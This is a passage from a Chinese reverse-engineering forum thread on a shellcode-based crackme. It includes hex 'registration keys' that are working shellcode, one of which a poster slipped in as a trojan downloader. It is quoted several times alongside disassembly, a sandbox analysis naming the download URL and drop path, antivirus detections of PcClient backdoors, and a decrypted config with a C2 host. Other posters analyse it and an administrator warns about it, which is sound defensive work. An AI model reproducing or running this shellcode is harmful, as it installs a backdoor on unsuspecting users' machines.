[游戏]一个奇怪的带壳crackme-加壳脱壳-看雪-安全社区|安全招聘|kanxue.com

最新回复 (78) ◀ 1 2 3 4 ▶
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 26 楼 25楼怎么象SHELL CODE 2006-12-12 23:31 0
CoolWolF 雪币： 230 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 118 粉丝 1 关注私信	CoolWolF 27 楼最初由笨笨雄* 发布* 25楼怎么象SHELL CODE To find the key, think like a hacker 你把那些key粘贴为二进制就明白了 2006-12-13 01:00 0
cater 雪币： 109 活跃值： (498) 能力值： ( LV12，RANK：220 ) 在线值：发帖 58 回帖 415 粉丝 3 关注私信	cater 5 28 楼感觉就是 Shell Code 2006-12-13 12:25 0
sbright 雪币： 146 活跃值： (33) 能力值： ( LV6，RANK：90 ) 在线值：发帖 120 回帖 995 粉丝 1 关注私信	sbright 2 29 楼 E930EFFFFFE92BEFFFFF9090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909079214000 111010010011000011101111111111111111111111101001001010111110111111111111111111111001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000001111001001000010100000000000000 还是不明白. 2006-12-13 18:14 0
cater 雪币： 109 活跃值： (498) 能力值： ( LV12，RANK：220 ) 在线值：发帖 58 回帖 415 粉丝 3 关注私信	cater 5 30 楼最初由 sbright* 发布* E930EFFFFFE92BEFFFFF90909090909090909090909090909090909090909090909090......................... 还是不明白. 汗，贴到 OD 里面看看~ 2006-12-13 21:09 0
sbright 雪币： 146 活跃值： (33) 能力值： ( LV6，RANK：90 ) 在线值：发帖 120 回帖 995 粉丝 1 关注私信	sbright 2 31 楼找个洞,钻进去了........ 终于学会了在od中如何粘贴..........选中一块区域,点右键....2进制...粘贴 ................................. 但是,大侠们是如何一步步弄出来的... 能说说.......................... 2006-12-13 22:33 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 32 楼最初由 skylly* 发布* 不是Telock,有简单的Tls反调试和进程逃逸楼主，你先设置OD停在系统断点,然后在409040处下断，运行 00409040 803D 08954000 C>cmp byte ptr [<ModuleEntryPoint>], 0CC 00409047 75 0A jnz short 00409053 00409049 C705 09954000 0>mov dword ptr [409509], 5000 ........ 学习了！不过TLS Data = 00409024，应该是停留在： 00409024 90 nop 00409025 90 nop 00409026 90 nop 00409027 90 nop 下面是检查真正入口点是否被调试器设置了CC。不过还是不知道TLS的CallBack address = 00409060 这个地方的作用。以前见过TLS文档，不过没看过，兄弟如果有文档的话能否给提供一份？ 2006-12-14 09:47 0
skylly 雪币： 304 活跃值： (82) 能力值： ( LV9，RANK：170 ) 在线值：发帖 70 回帖 1087 粉丝 2 关注私信	skylly 4 33 楼最初由 nbw* 发布* 学习了！不过TLS Data = 00409024，应该是停留在： 00409024 90 nop ........ 我也没有文档，看过的东西从来不保存的，能记住多少算多少. 这个EXE的TLS表中,AddressOfCallBacks处是409060,意味着TLS入口的地址保存在409060处,而409060处存的是409040,所以TLS入口为409040 我对TLS还是略知皮毛,最早见识TLS还是ooo做的那个利用TLS来做小动作的程序。参考 http://www.pediy.com/bbshtml/bbs7/pediy7-660.htm 2006-12-14 21:46 0
nbw 雪币： 339 活跃值： (1510) 能力值： ( LV13，RANK：970 ) 在线值：发帖 141 回帖 2842 粉丝 23 关注私信	nbw 24 34 楼噢，原?狨紫呀。还是没记住，下次碰到了再来问你 2006-12-14 22:47 0
binbinbin 雪币： 405 活跃值： (10) 能力值： ( LV9，RANK：1130 ) 在线值：发帖 51 回帖 690 粉丝 0 关注私信	binbinbin 28 35 楼站个位置先。这个cm我没有头绪。 2006-12-16 09:23 0
KuNgBiM 雪币： 817 活跃值： (1927) 能力值： ( LV12，RANK：2670 ) 在线值：发帖 500 回帖 2517 粉丝 22 关注私信	KuNgBiM 66 36 楼除heXer外,shoooo,linex,cater人引用的SHELL CODE代码: EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B 01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C 01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068 AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375 7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862 732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811 AB1040C1E80866C74001602266B8732280700190E943EEFFFF90?????????????????? ??????????????????????9090909074214000 其中以下代码可以修改标题: ?????????????????? ?????????????????????? 代码解密: 演示代码: EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B 01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C 01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068 AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375 7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862 732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811 AB1040C1E80866C74001602266B8732280700190E943EEFFFF90313131313131313131 31313131313131313131319090909074214000 2006-12-17 20:37 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 37 楼 555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE 这个也能注册? 2006-12-20 20:58 0
enterf 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	enterf 38 楼我要努力学习，到时候我也能像大家一样加入讨论 2006-12-21 19:19 0
heXer 雪币： 254 活跃值： (126) 能力值： ( LV8，RANK：130 ) 在线值：发帖 12 回帖 802 粉丝 2 关注私信	heXer 3 39 楼不要试别人的KEY，有危险，完全给你可以搞个灰鸽子进去 2006-12-21 21:45 0
sbright 雪币： 146 活跃值： (33) 能力值： ( LV6，RANK：90 ) 在线值：发帖 120 回帖 995 粉丝 1 关注私信	sbright 2 40 楼最初由 heXer* 发布* 不要试别人的KEY，有危险，完全给你可以搞个灰鸽子进去会搞也不搞灰鸽......搞个rootkit.... 2006-12-21 21:54 0
heXer 雪币： 254 活跃值： (126) 能力值： ( LV8，RANK：130 ) 在线值：发帖 12 回帖 802 粉丝 2 关注私信	heXer 3 41 楼最初由 peaceclub* 发布* 555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE 这个也能注册? 把http://www.h86.com.cn/test/shnokey.jpg下载到system32\gs.exe然后执行 gs.exe执行以后会下载一个叫yieoxsyf.d1?的文件到system32下，并且是隐藏的，用IceSword可以看到还会启动你的iexplore.exe并把那个yieoxsyf注入进去，iexplore.exe并不会跑出界面来，是个隐藏进程这个东西具体会做什么我不清楚，我只是简单的在虚拟机下直接跑了一下，发现有这些变化的，然后恢复了snapshot 我把两个文件打包在复件里，文件名也改成非exe了，有兴趣的可以研究 rar压缩密码：12344321 上传的附件： what.rar （35.65kb，1次下载） 2006-12-21 22:33 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 42 楼最初由 peaceclub* 发布* 555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE 这个也能注册? 重要提醒！这是一个利用Shellcoder原理进行注册的CrackMe,放到这里只是当一个游戏，以掌握一些Shellcoder原理。peaceclub提供的这个key由于含有字符0,因此还不能溢出执行。但这段代码含有明显的恶意行为，如果将代码复制到OD里执行，程序将下载shnokey.jpg到系统目录并释放文件，然后注入iexplore.exe，并隐藏相关信息，分析详见41楼，而其本人没对这段代码带来的不良影响有任何说明!论坛一直反对各种放马行为，如果是木马、恶意代码或病毒一定需要用显眼的文字注明！希望peaceclub给个解释！ 2006-12-22 09:32 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 43 楼 RPWT? copy了一份 shellcode: 004022CA EB 02 EB 4D ?胪 004022DA E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 3C 8B 7C 05 棂???$$?<? 004022EA 78 01 EF 8B 4F 18 8B 5F 20 01 EB 49 8B 34 8B 01 x?O? 肷?? 004022FA EE 31 C0 99 AC 84 C0 74 07 C1 CA 0D 01 C2 EB F4 ???吏潦.码 0040230A 3B 54 24 28 75 E5 8B 5F 24 01 EB 66 8B 0C 4B 8B ;T$(u?_$腈?K 0040231A 5F 1C 01 EB 03 2C 8B 89 6C 24 1C 61 C3 31 DB 64 _?,?l$a?垆 0040232A 8B 43 30 8B 40 0C 8B 70 1C AD 8B 40 08 5E 68 8E ?0?.??@^h 0040233A 4E 0E EC 50 68 AA FC 0D 7C 50 FF D6 8B F8 5A 5A N煨h?.\|P??ZZ 0040234A FF D6 66 53 6A 32 66 68 6C 33 68 73 68 65 6C 54 ?fSj2fhl3hshelT 0040235A FF D0 53 6A 41 68 63 75 74 65 68 6C 45 78 65 68 ?SjAhcutehlExeh 0040236A 53 68 65 6C 54 50 FF D7 53 68 6F 70 65 6E 53 68 ShelTP?ShopenSh 0040237A 2E 63 6F 6D 68 65 64 69 79 68 62 73 2E 70 68 3A .comhediyhbs.ph: 0040238A 2F 2F 62 68 68 74 74 70 6A 03 53 53 8D 54 24 0C //bhhttpjSS?$. 0040239A 52 8D 54 24 28 52 53 FF D0 83 C4 48 B8 11 AB 10 R?$(RS??H?? 004023AA 40 C1 E8 08 66 C7 40 01 60 22 66 B8 73 22 80 70 @凌f抢`"f阁"? 004023BA 01 90 E9 43 EE FF FF 90 53 61 79 3A D2 BB D6 B1 ?C??Say:一直 004023CA C3 BB D3 D0 B8 DF CA D6 C4 F1 CE D2 D3 D0 B8 DF 没有高手鸟我有高 004023DA CA D6 C4 F1 CE D2 90 90 90 90 90 90 90 90 90 90 手鸟我????? 004023EA 90 90 ?. 004022D6 /EB 02 jmp short 004022DA 004022D8 \|EB 4D jmp short 00402327 004022DA \E8 F9FFFFFF call 004022D8 004022DF 60 pushad 004022E0 8B6C24 24 mov ebp, dword ptr [esp+24] 004022E4 8B45 3C mov eax, dword ptr [ebp+3C] 004022E7 8B7C05 78 mov edi, dword ptr [ebp+eax+78] 004022EB 01EF add edi, ebp 004022ED 8B4F 18 mov ecx, dword ptr [edi+18] 004022F0 8B5F 20 mov ebx, dword ptr [edi+20] 004022F3 01EB add ebx, ebp 004022F5 49 dec ecx 004022F6 8B348B mov esi, dword ptr [ebx+ecx4] 004022F9 01EE add esi, ebp 004022FB 31C0 xor eax, eax 004022FD 99 cdq 004022FE AC lods byte ptr [esi] 004022FF 84C0 test al, al 00402301 74 07 je short 0040230A 00402303 C1CA 0D ror edx, 0D 00402306 01C2 add edx, eax 00402308 ^ EB F4 jmp short 004022FE 0040230A 3B5424 28 cmp edx, dword ptr [esp+28] 0040230E ^ 75 E5 jnz short 004022F5 00402310 8B5F 24 mov ebx, dword ptr [edi+24] 00402313 01EB add ebx, ebp 00402315 66:8B0C4B mov cx, word ptr [ebx+ecx2] 00402319 8B5F 1C mov ebx, dword ptr [edi+1C] 0040231C 01EB add ebx, ebp 0040231E 032C8B add ebp, dword ptr [ebx+ecx*4] 00402321 896C24 1C mov dword ptr [esp+1C], ebp 00402325 61 popad 00402326 C3 retn 00402327 31DB xor ebx, ebx 00402329 64:8B43 30 mov eax, dword ptr fs:[ebx+30] 0040232D 8B40 0C mov eax, dword ptr [eax+C] 00402330 8B70 1C mov esi, dword ptr [eax+1C] 00402333 AD lods dword ptr [esi] 00402334 8B40 08 mov eax, dword ptr [eax+8] 00402337 5E pop esi 00402338 68 8E4E0EEC push EC0E4E8E 0040233D 50 push eax 0040233E 68 AAFC0D7C push 7C0DFCAA 00402343 50 push eax 00402344 FFD6 call esi 00402346 8BF8 mov edi, eax 00402348 5A pop edx 00402349 5A pop edx 0040234A FFD6 call esi 0040234C 66:53 push bx 0040234E 6A 32 push 32 00402350 66:68 6C33 push 336C 00402354 68 7368656C push 6C656873 00402359 54 push esp 0040235A FFD0 call eax 0040235C 53 push ebx 0040235D 6A 41 push 41 0040235F 68 63757465 push 65747563 00402364 68 6C457865 push 6578456C 00402369 68 5368656C push 6C656853 0040236E 54 push esp 0040236F 50 push eax 00402370 FFD7 call edi 00402372 53 push ebx 00402373 68 6F70656E push 6E65706F 00402378 53 push ebx 00402379 68 2E636F6D push 6D6F632E 0040237E 68 65646979 push 79696465 00402383 68 62732E70 push 702E7362 00402388 68 3A2F2F62 push 622F2F3A 0040238D 68 68747470 push 70747468 00402392 6A 03 push 3 00402394 53 push ebx 00402395 53 push ebx 00402396 8D5424 0C lea edx, dword ptr [esp+C] 0040239A 52 push edx 0040239B 8D5424 28 lea edx, dword ptr [esp+28] 0040239F 52 push edx 004023A0 53 push ebx 004023A1 FFD0 call eax 004023A3 83C4 48 add esp, 48 004023A6 B8 11AB1040 mov eax, 4010AB11 004023AB C1E8 08 shr eax, 8 004023AE 66:C740 01 6022 mov word ptr [eax+1], 2260 004023B4 66:B8 7322 mov ax, 2273 004023B8 8070 01 90 xor byte ptr [eax+1], 90 004023BC - E9 43EEFFFF jmp 00401204 004023C1 90 nop 004023C2 53 push ebx 004023C3 61 popad 004023C4 79 3A jns short 00402400 004023C6 D2BB D6B1C3BB sar byte ptr [ebx+BBC3B1D6], cl 004023CC D3D0 rcl eax, cl 004023CE B8 DFCAD6C4 mov eax, C4D6CADF 004023D3 F1 int1 004023D4 CE into 004023D5 D2D3 rcl bl, cl 004023D7 D0B8 DFCAD6C4 sar byte ptr [eax+C4D6CADF], 1 004023DD F1 int1 004023DE CE into 004023DF D290 90909090 rcl byte ptr [eax+90909090], cl 004023E5 90 nop 004023E6 90 nop 004023E7 90 nop 004023E8 90 nop 004023E9 90 nop 004023EA 90 nop 004023EB 90 nop 2006-12-22 10:06 0
DarkNess0ut 雪币： 367 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 212 粉丝 2 关注私信	DarkNess0ut 44 楼 .text:100036AE ; END OF FUNCTION CHUNK FOR DllEntryPoint .text:100036AE ; --------------------------------------------------------------------------- .text:100036B3 s->Goldsun db 'Goldsun',0 .text:100036BB align 4 .text:100036BC dd 0 .text:100036C0 db 0 .text:100036C1 .text:100036C1 ; =============== S U B R O U T I N E ======================================= .text:100036C1 .text:100036C1 .text:100036C1 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved) .text:100036C1 public DllEntryPoint .text:100036C1 DllEntryPoint proc near 这下............. 2006-12-22 10:46 0
skylly 雪币： 304 活跃值： (82) 能力值： ( LV9，RANK：170 ) 在线值：发帖 70 回帖 1087 粉丝 2 关注私信	skylly 4 45 楼原以为peaceclub是个好人,想也没想就运行了他的key, 2006-12-22 11:05 0
飞段雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 18 粉丝 0 关注私信	飞段 46 楼 1: AntiVir 7.3.0.21 12.21.2006 DR/PcClient.Gen Authentium 4.93.8 12.22.2006 no virus found Avast 4.7.892.0 12.21.2006 Win32:Pcclient-CY AVG 386 12.21.2006 no virus found BitDefender 7.2 12.22.2006 Dropped:Backdoor.Pcclient.SYS CAT-QuickHeal 8.00 12.21.2006 (Suspicious) - DNAScan ClamAV devel-20060426 12.21.2006 no virus found DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856 eSafe 7.0.14.0 12.21.2006 no virus found eTrust-InoculateIT 23.73.95 12.22.2006 no virus found eTrust-Vet 30.3.3268 12.21.2006 no virus found Ewido 4.0 12.21.2006 no virus found Fortinet 2.82.0.0 12.21.2006 no virus found F-Prot 3.16f 12.21.2006 no virus found F-Prot4 4.2.1.29 12.21.2006 no virus found Ikarus T3.1.0.27 12.21.2006 no virus found Kaspersky 4.0.2.24 12.22.2006 no virus found McAfee 4924 12.21.2006 BackDoor-CKB Microsoft 1.1904 12.21.2006 no virus found NOD32v2 1934 12.21.2006 a variant of Win32/PcClient Norman 5.80.02 12.21.2006 no virus found Panda 9.0.0.4 12.21.2006 Suspicious file Prevx1 V2 12.22.2006 no virus found Sophos 4.12.0 12.21.2006 no virus found Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious TheHacker 6.0.3.135 12.20.2006 no virus found UNA 1.83 12.21.2006 no virus found VBA32 3.11.1 12.21.2006 suspected of Backdoor.Hupigon.17 VirusBuster 4.3.19:9 12.21.2006 no virus found 2: AntiVir 7.3.0.21 12.21.2006 TR/Dldr.Small.bgk Authentium 4.93.8 12.22.2006 no virus found Avast 4.7.892.0 12.21.2006 Win32:PcClient-EO AVG 386 12.21.2006 no virus found BitDefender 7.2 12.22.2006 Trojan.Downloader.Gen CAT-QuickHeal 8.00 12.21.2006 no virus found ClamAV devel-20060426 12.21.2006 no virus found DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856 eSafe 7.0.14.0 12.21.2006 no virus found eTrust-InoculateIT 23.73.95 12.22.2006 no virus found eTrust-Vet 30.3.3268 12.21.2006 Win32/Pcclient!generic Ewido 4.0 12.21.2006 Backdoor.PcClient.cj Fortinet 2.82.0.0 12.21.2006 no virus found F-Prot 3.16f 12.21.2006 no virus found F-Prot4 4.2.1.29 12.21.2006 no virus found Ikarus T3.1.0.27 12.21.2006 Trojan-Downloader.Win32.Small.BID Kaspersky 4.0.2.24 12.22.2006 no virus found McAfee 4924 12.21.2006 no virus found Microsoft 1.1904 12.21.2006 no virus found NOD32v2 1934 12.21.2006 a variant of Win32/PcClient.IF Norman 5.80.02 12.21.2006 no virus found Panda 9.0.0.4 12.21.2006 Suspicious file Prevx1 V2 12.22.2006 no virus found Sophos 4.12.0 12.21.2006 no virus found Sunbelt 2.2.907.0 12.18.2006 no virus found TheHacker 6.0.3.135 12.20.2006 no virus found UNA 1.83 12.21.2006 no virus found VBA32 3.11.1 12.21.2006 suspected of Backdoor.PcClient.1 VirusBuster 4.3.19:9 12.21.2006 no virus found 木马兼下载器,好象还有驱动,RP有待提高! 2006-12-22 11:25 0
heXer 雪币： 254 活跃值： (126) 能力值： ( LV8，RANK：130 ) 在线值：发帖 12 回帖 802 粉丝 2 关注私信	heXer 3 47 楼密钥:10 20 17 10 09 55 11 EB 解密yieoxsyf.d1l末尾0x8B8字节，应该是配置吧 000AEFD0 90 1F 00 00 00 26 00 00 AC 2D 00 00 83 1F 00 00 ?...&..?..?.. 000AEFE0 00 00 00 00 0A 00 00 00 31 00 00 00 01 00 00 00 ........1...... 000AEFF0 33 88 00 00 77 65 62 75 70 64 61 74 65 2E 33 33 3?.webupdate.33 000AF000 32 32 2E 6F 72 67 00 00 00 00 00 00 00 00 00 00 22.org.......... 000AF010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF0F0 00 00 00 00 53 48 45 44 55 00 00 00 00 00 00 00 ....SHEDU....... 000AF100 00 00 00 00 00 00 00 00 00 00 00 00 59 69 65 6F ............Yieo 000AF110 78 73 79 66 00 00 00 00 00 00 00 00 43 3A 5C 50 xsyf........C:\P 000AF120 72 6F 67 72 61 6D 20 46 69 6C 65 73 5C 49 6E 74 rogram Files\Int 000AF130 65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 69 ernet Explorer\i 000AF140 65 78 70 6C 6F 72 65 2E 65 78 65 00 00 00 00 00 explore.exe..... 000AF150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF160 67 6F 6C 64 73 75 6E 00 00 00 00 00 00 00 00 00 goldsun......... 000AF170 00 00 00 00 00 00 00 00 FB 4F 50 4F 7B 5B FE 47 ........?PO{[? 000AF180 82 F4 A2 7C 89 5E 37 3D 43 3A 5C 44 6F 63 75 6D ?Ⅻ?7=C:\Docum 000AF190 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 ents and Setting 000AF1A0 73 5C 67 61 74 65 73 5C D7 C0 C3 E6 5C 73 68 6E s\gates\桌面\shn 000AF1B0 6F 6B 65 79 2E 65 78 65 00 00 00 00 00 00 00 00 okey.exe........ 000AF1C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF1D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF1E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF1F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF280 00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54 ........C:\WINNT 000AF290 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 \system32\driver 000AF2A0 73 5C 59 69 65 6F 78 73 79 66 2E 73 79 73 00 00 s\Yieoxsyf.sys.. 000AF2B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF2C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF2D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF2E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF2F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF380 00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D ........C:\DOCUM 000AF390 45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53 E~1\gates\LOCALS 000AF3A0 7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66 ~1\Temp\Yieoxsyf 000AF3B0 2E 74 6D 70 00 00 00 00 00 00 00 00 00 00 00 00 .tmp............ 000AF3C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF3D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF3E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF3F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF480 00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D ........C:\DOCUM 000AF490 45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53 E~1\gates\LOCALS 000AF4A0 7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66 ~1\Temp\Yieoxsyf 000AF4B0 2E 64 6C 31 00 00 00 00 00 00 00 00 00 00 00 00 .dl1............ 000AF4C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF4D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF4E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF4F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 